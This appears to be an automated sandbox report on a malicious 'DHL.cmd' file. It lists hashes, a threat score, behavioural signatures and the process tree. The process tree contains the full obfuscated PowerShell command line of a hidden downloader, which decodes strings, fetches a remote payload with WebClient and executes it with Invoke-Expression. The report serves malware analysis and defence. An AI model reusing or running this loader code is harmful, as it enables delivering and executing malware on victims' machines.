Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    12-07-2024 09:34

General

  • Target

    DHL.cmd

  • Size

    6KB

  • MD5

    4fac338e225a33e53806bf2f27f3ed0e

  • SHA1

    5e7f1620ebe0099e2c7014b2e725eefbdaecab85

  • SHA256

    1825ea48164cc22c0872fea1d7ed7698d8ac439c8404207db2234cdc2b95f1ba

  • SHA512

    cdeee8abcf1153740d8d1c0cc82c23c2f4b71fb6335b4fa1c3c5bf4838a0186f8043b3b5223c8d13c62c777be7cb8df2ef12a617485cdf61c527e2d5f5888844

  • SSDEEP

    192:YWFEaVQEQKcwglcCy6XnU/pTmAaelT2dvmf:ThuZXGCyWU/praeIdvW

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 58 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\DHL.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "write 'Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne Mandlige Kannibalismes Scalers Multimate38 Theologised77 Abrico Fibber Mjsom Forhandlersalg Sindssvages Xx Dybels Tarmkanalers Tel Backhaul Malacanthine Reaktionsevnes Pastoralerne handlelammet Chemotherapeuticness104 Fabrikatets Garewaite Atimy Problemomraaderne';If (${host}.CurrentCulture) {$Truncus++;}$Euforisering='SUBsTR';$Euforisering+='ing';Function Bleens($Nedrakkes){$timetalsreduktionens=$Nedrakkes.Length-$Truncus;For( $Ryotwary=4;$Ryotwary -lt $timetalsreduktionens;$Ryotwary+=5){$Mandlige+=$Nedrakkes.$Euforisering.Invoke( $Ryotwary, $Truncus);}$Mandlige;}function Eddied($Handrail){ . ($Gidseltageres) ($Handrail);}$Personifikationers137=Bleens ' MetM DokoImmazFagmi,ryslIntrl Af.aBe,y/Brud5 Rec. eac0Vild ,up(ArusWReceiUs ln ispdStamoNodewF resCogn ,raaNPassT,pgj Stfo1Crib0 St,.Soap0Zi.c;Sind LesiWame.iSludn Nar6Resq4 tla;Refu SystxRavn6Spar4.rug;Skv. AarsrAl.avTil :Indv1Cero2Hold1Lemm.B.ar0Prog) .or TypGMa me G.mcWamakTilhoAnt./For,2Toet0 Fo.1.oin0Tr,d0Udle1Pred0Spyg1Micr UngeF D miHalvr JogeMandfSkolo Kilxfors/ ecu1E.tr2 In 1 rl.Re t0Tamt ';$Affaldsbrser171=Bleens 'RappUknigsGrimeBo drSkri-DdsbAUdvegD,apeBrodnMasttdi.u ';$Theologised77=Bleens 'Bog.h AentFiddtAtalp .nds Mon:Eman/Stng/Ussee H.mcswaroEndenBracsSladt Di,rSoutaLittm None CatdFatuioo.iaSu s.Fod,cGeneoklismor.h/MisdBUrovrKrisn Bude UdvbMancyRokkg Freg ,elesig.rSteriUn.e.D bbmVanvsUnbooSvig ';$Willowiness=Bleens 'Stet> ka ';$Gidseltageres=Bleens 'Eosii fodeResuxTew. ';$Fissens='Mjsom';$Strombus = Bleens ' PhieGlosc SkrhGe uo Af. Seks%G,una synpaffapS,led,ispa Gr tThecaDo t%Clod\SkruABenteMogur SkuoErhvsLiffotrailBesndLoneaAflaaKreds.upeeUndsn Non.AntiC CheoFeasmDest ,oot&Gr,g&Buni OutmeIn rcR,dehStnnoStaa DigetRt b ';Eddied (Bleens ' nc$ ling Ac,lTilbo Coeb undaBiv.l.sta: Un,CU,deoMiset BonaPo inA,ho=Kaza(AvescAerom.rridI.dt Indl/MagecJaco skep$La eS SubtThiur.maaoKr.kmLocobL.ukuUdsksbeto)Angl ');Eddied (Bleens 'Metr$.lfag Syml VedoUnd bCiana ScolVic.:MeshMsal uFaullT qut Quai Elym Wakaforbt ,abe S.i3Broi8.mso=Flet$ PetT Burh shae.yndoTam,l,rivoDev,g,roqiSsl sVoc e CondS ak7Prod7Oms,.Ceras M sp ,eclGloriA,metMel (Balm$SaimWAppliFjerl kralLateoSplewNortiSebanCoffeAmtssG.uns For) Men ');Eddied (Bleens 'Hemi[TornNParaeR iltN,ve.M.gnSTi,eeraffrTricvMu,ri ExocTatoe.issPBisto KoniArkinredet ,alMCapiaS.ymn b sa,illgVatne Knir Tsu]Bacc:Varv: LumSQ.areJordc S,puReshrU ntiSyn,tIne yLumbPK.agrB.gyoT.ixtOveroUnmucEngioFloelMad No,d= Sca cha [WhipNIm.ee atat Men.FusiSUmque.itacLatruAntir Inci By.tA.foy toaPEpi rSoveoBesmtTot o Autc OmboBarolIn,mT Pr yStr.pR seeFoug]F,rt:,ilo:SlgtTUndelBanas an1Blet2Zeuc ');$Theologised77=$Multimate38[0];$Nonmultiple= (Bleens 'dr.a$ negKatel,fflo NumbBjrnaEnchlMisk:DeteUSax hBaf yE,sfrgil lCambi P eg poreF li=AspiN Elaecamiw ys-o,taOUnfrb,ubij.ermeFunkcPiketTurd Ov rSChriyHumpsSnapt FaceNonvm Kul.FyriN ,ndeRekltJoe,. HolWClameBldtbDe eCMarslS ioiDisce ,vinPoget');$Nonmultiple+=$Cotan[1];Eddied ($Nonmultiple);Eddied (Bleens 'Vide$VideURenuh PrayS.itr semlUn,oi ud.g ared,oe. eksH OrleImplaVentd nineFaldrProds C.e[kaut$CrysAHenhfUntifFlora MurlPlend .hisQuo.bRemorSsygsRea.eDe irShi 1Ton.7Sup,1Glau]Soci=Fro,$VictPflj,eInd,r Ti s D poSprinUnc,ia,raf.ouriThank,okaaWintt HepiUnt.oTordnSt.aeDr grDatas Cul1 Sko3Cong7Prte ');$Unto=Bleens ' awk$UdpeUSugnhAccey Ba,rVa.olPyraiRidagForbeEn.e. Mi DSkruoRemaw FernVenalArreo HelaTilbd .ntF ConiAalelMataeTre.(Skot$Sl,mTrrinhSacreMegaoFredlGaaeoBiltg,ordi ertsAegtePa edImpa7 Sol7M.cr,H,rd$Sy.kGK.isa ,ndrP.eae,uglwFosfa holiIsogtSuleeHusu)F.rs ';$Garewaite=$Cotan[0];Eddied (Bleens 'Zoha$Ha,cgIndilMirio lkkbSil.aB jdl arr:CeteWL.pao BiloFolkd St.hFngseS.nswCha,eSp.irArie=Ford(FastTTelee FlasSkamtSyds-CurePSkibaSelvtY erhBrnd Pre,$AdlyGFirsagr.drPinkeTumlwProdaanteiSchitDeadeAar.)gett ');while (!$Woodhewer) {Eddied (Bleens 'Vamo$ForegServllivsoSmilbH,emaRenslLute:PurlGSkr,otensn igaesoppSpktoSohodD tr=Umbr$Mil,tBorerUn.lu refe Mac ') ;Eddied $Unto;Eddied (Bleens 'EfteS EndtUnbia orerGl,stMynd-UninSSmatlCrose Cale.aukpBesk Para4H,da ');Eddied (Bleens 'Di,e$Forkg NullA,tooK,nsbHoveaM,rdlIndd: mpWOutfoBesmoUnc,d .urh FuneD,arwropee,oleroct,=outb( DetTUniceRuins LovtAfsk-undkPRebeaB.sotPhonhUdra To,$ TabGNiv.aOlymrPrimeElsewPresaOrgaiBlovtWogheMa t)indk ') ;Eddied (Bleens 'Al.e$ Regg SkolUniooForgbRingaflukl M s: KakSGloscB odaRev.lDistePreer P.osSk,v=Iacc$ UvigTu.ilJerkoGulnbra taFej l Sti:CresKG,gsa A.bnBr,dnPo.ei GrnbProba nmlMissiIntesTrummE.eneCigascapi+Mynp+bolt%Endr$GabeMAtteu Si l s,stAndeiFab mnd naAtritBagge Kap3 Kom8Tapp. PrecGni oM tiuSkygnPopltinte ') ;$Theologised77=$Multimate38[$Scalers];}$Grafikindhold=298359;$demodulatorers=27193;Eddied (Bleens ' Skr$K ligken.lOogoo DypbR.vaaRevolDia :,onbFAilmoVerdr.owehFje.a AfbnBewidPredlHoroe GarrRemisDeteaTryplPre,g.nde Aage=Lykk IndlG F seU ertDo t-PlayCpolioFjednPaxitO,hoeForfntractAfd In.t$Pe cG.aviaEj.tr F reA ndwUvilaZymoiMartt UnieMale ');Eddied (Bleens 'Beau$conggAngil DaloV.jbbBalnaredil Cit:InteUKonfnPrecw uneiLithsKreshInv fVedhu gral am2Term3Hjem3Nonf Vaad=Snke Kok[ViiiSEndoyBrodsMyrrt itheM nom liz.JenfC N.do .rtn PalvStemeUmorrCelet Kr ]Alle:nest: ValFPlutrsk,ioK.udmbrubBGrana .ins B,geShor6r ar4F,rsSFuldtKan.r CabiJagenO.tagUnme(Py,a$ alF Tr.oHidfr SirhNoira Pr n,ackdBetylSupee AfvrAktisEntra,hadlLandg Ban)hftb ');Eddied (Bleens ' con$ nhegP lilBarwoAp,ebEm,saSnowl Par: ParDM inyClarbkiloe Cryl hipsAden Gri,=Ugem ill[TuliSEnvey CrasbogwtSc.tedambm ,mu.ProsT TareEscaxAntitB,ho. ShiE ,qunSel cLskuoDeted,apyiLgeknPresgSu.a] Gem:Funk:UnbeAKataSAminC,urtIdiabIu fo.frilGTidseRaftt S,eS ultQuarrRegaiTricnsiphg.lka( Bug$ SmaUBo,tnCondwSnici esosDaglhGoldfAppruT.aflInbo2 ag3Poly3Hero)Brea ');Eddied (Bleens ' dde$ alg o.glTrynoPentbPrveaSvinl,dst:TidsaKettlSvinbYmteiAfmrnAlfeiLiths Su.mbec.=T.yl$ KarDMurayGen.b dvie C olovers,ore. KnosAntruDuodbGenlsNon t eslr AssiScannBombgTur,( Wei$ KloGSkytrSkria tenf ciriKr lkNeweiG.ninCa.adMogohH poo katlTramdbrai, Je.$Zymod RudeOmsvmmarko abd S.tuPenglEnviap lotDragoGus r FabeTheer IndsBomb)Rini ');Eddied $albinism;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2496
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aerosoldaasen.Com && echo t"
        3⤵
          PID:2756

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2496-4-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp

      Filesize

      4KB

    • memory/2496-5-0x000000001B780000-0x000000001BA62000-memory.dmp

      Filesize

      2.9MB

    • memory/2496-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

      Filesize

      32KB

    • memory/2496-11-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2496-10-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2496-9-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2496-8-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2496-7-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2496-12-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

      Filesize

      9.6MB

    • memory/2496-13-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp

      Filesize

      4KB

    • memory/2496-14-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

      Filesize

      9.6MB